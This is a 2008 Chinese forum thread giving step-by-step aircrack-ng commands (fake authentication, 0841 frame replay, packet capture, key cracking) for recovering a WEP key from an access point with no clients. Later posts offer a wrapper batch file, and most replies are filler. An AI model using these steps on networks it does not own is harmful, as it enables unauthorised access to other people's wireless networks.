ubnt解决方案
查看: 197457|回复: 1295

完全无客户端 wep 破解方法

[复制链接]

134

回帖

1131

积分

105 小时

在线时间

上尉

注册时间
2006-11-24
金币
697 个
威望
26 个
荣誉
8 个
累计签到:21 天
连续签到:0 天
[LV.50]初入江湖
发表于 2008-1-20 00:12 |显示全部楼层

试验环境

ap:d-link 724 (没有任何有线和无线连接)

os:windows

网卡:atheros 驱动版本为commview 4.2.2.104

下面的操作在windows下linux下原理相同

第一步 (打开监视模式)

airserv-ng -c 1 -d "commview.dll|debug"

-c 1 (监视通道1)


第二步 (使用 fake authentication 攻击方式)

aireplay-ng -1 0 -e <ap essid> -a <ap bssid> -h <网卡mac> 127.0.0.1:666

第三步 (捕捉包)

airodump-ng -c 1 -w cap 127.0.0.1:666

第四步 (使用 interactive frame selection)这一步是关键

aireplayer-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -h <网卡mac> -b <ap bssid> 127.0.0.1:666

解释 -p 0841 即将frame control 设置为 0841

运行这个命令后屏幕显示读包我测试的时候一般要读1-3万个包多个包(这个过程较长)

读到了一定数量后就会有下面的画面显示

一定要放弃第一个包(我测试的时候基本上放弃3个包以上)不然这个进程会死掉无法继续了
注意这张解图 BSSID = 00:0F:3D:32:BD:5D(ap mac) 并且 Source MAC = 00:0F:3D:32:BD:5D(ap mac)

测试几次都是一样的!!

然后开始发包了

可以看到 airodump-ng窗口的数据在增长


最后使用aircrack-ng破解了

aircrack-ng cap-01.cap

----------------------

后记:这篇文章写得较为粗糙可能有些网友看不太明白较为基础的可以参看我的

http://forum.anywlan.com/dispbbs.asp?BoardID=15&ID=7225&replyID=&skin=1

有时间我会将该片文章的windows批处理文件写好的!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册 微信登录

x

评分

2

查看全部评分

177

回帖

1万

积分

1057 小时

在线时间

上校

注册时间
2017-10-26
金币
17595 个
威望
1 个
荣誉
0 个
累计签到:1515 天
连续签到:1 天
[LV.1825]无线元老
发表于 2023-3-2 17:48 |显示全部楼层

回复看下文
回复

使用道具 举报

134

回帖

1131

积分

105 小时

在线时间

上尉

注册时间
2006-11-24
金币
697 个
威望
26 个
荣誉
8 个
累计签到:21 天
连续签到:0 天
[LV.50]初入江湖
发表于 2008-1-20 10:38 |显示全部楼层

我在airdump-ng的窗口中注意了一下这个D-LINK AP 在没有任何客户端的情况下也不是完全没有数据(DATA)

只是很少而已大约半小时就10来个,并且这些数据从原地址和目标地址上来判断好像是自己发给自己的。

如果你的ap完全没有数据我想这种方法也没有效果!!

回复

使用道具 举报

A友  发表于 2008-1-20 14:16

批处理文件改好了需要的自行下载,解开后使用。

使用方法 air0841 <通道号> <ap essid> <ap bssid>

游客,如果您要查看本帖隐藏内容请回复

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册 微信登录

x
回复

使用道具

134

回帖

1131

积分

105 小时

在线时间

上尉

注册时间
2006-11-24
金币
697 个
威望
26 个
荣誉
8 个
累计签到:21 天
连续签到:0 天
[LV.50]初入江湖
发表于 2008-1-20 14:20 |显示全部楼层

批处理文件修改完毕,需要者回复后可下载

使用方法 air0841< 通道号> <ap essid> <ap bssid>

希望大家共同讨论

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册 微信登录

x
回复

使用道具 举报

700

回帖

1万

积分

107 小时

在线时间

VIP

终身荣誉会员终身荣誉版主

注册时间
2007-12-8
金币
11440 个
威望
28 个
荣誉
0 个

尚未签到

发表于 2008-1-20 16:40 |显示全部楼层

呵呵,那就老老实实的回复一次吧!

回复

使用道具 举报

头像被屏蔽

72

回帖

634

积分

36 小时

在线时间

禁止发言

注册时间
2007-4-5
金币
529 个
威望
2 个
荣誉
1 个

尚未签到

发表于 2008-1-20 16:47 |显示全部楼层

回复一次吧!

回复

使用道具 举报

18

回帖

130

积分

0 小时

在线时间

上等兵

注册时间
2007-5-6
金币
112 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-1-20 17:27 |显示全部楼层
回复看下文。[em02]
回复

使用道具 举报

208

回帖

703

积分

159 小时

在线时间

中尉

注册时间
2007-6-8
金币
409 个
威望
7 个
荣誉
1 个

尚未签到

发表于 2008-1-20 17:31 |显示全部楼层

回复一次吧!
转自中国无线门户,原文地址:http://forum.anywlan.com/dispbbs.asp?boardID=15&ID=7982&page=1

回复

使用道具 举报

17

回帖

161

积分

0 小时

在线时间

上等兵

注册时间
2007-12-27
金币
141 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-1-21 09:50 |显示全部楼层

回复可见

回复

使用道具 举报

6

回帖

74

积分

0 小时

在线时间

新兵上阵

注册时间
2004-12-16
金币
68 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-1-21 10:37 |显示全部楼层

回复可见
转自中国无线门户,原文地址:http://forum.anywlan.com/dispbbs.asp?boardID=15&ID=7982&page=1

回复

使用道具 举报

103

回帖

791

积分

64 小时

在线时间

中尉

注册时间
2008-1-9
金币
647 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-1-22 12:46 |显示全部楼层

多谢提供支持

回复

使用道具 举报

17

回帖

134

积分

0 小时

在线时间

上等兵

注册时间
2008-1-6
金币
115 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2008-1-22 12:50 |显示全部楼层
kankanknaknakn
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2024-5-6 21:47

返回顶部 返回列表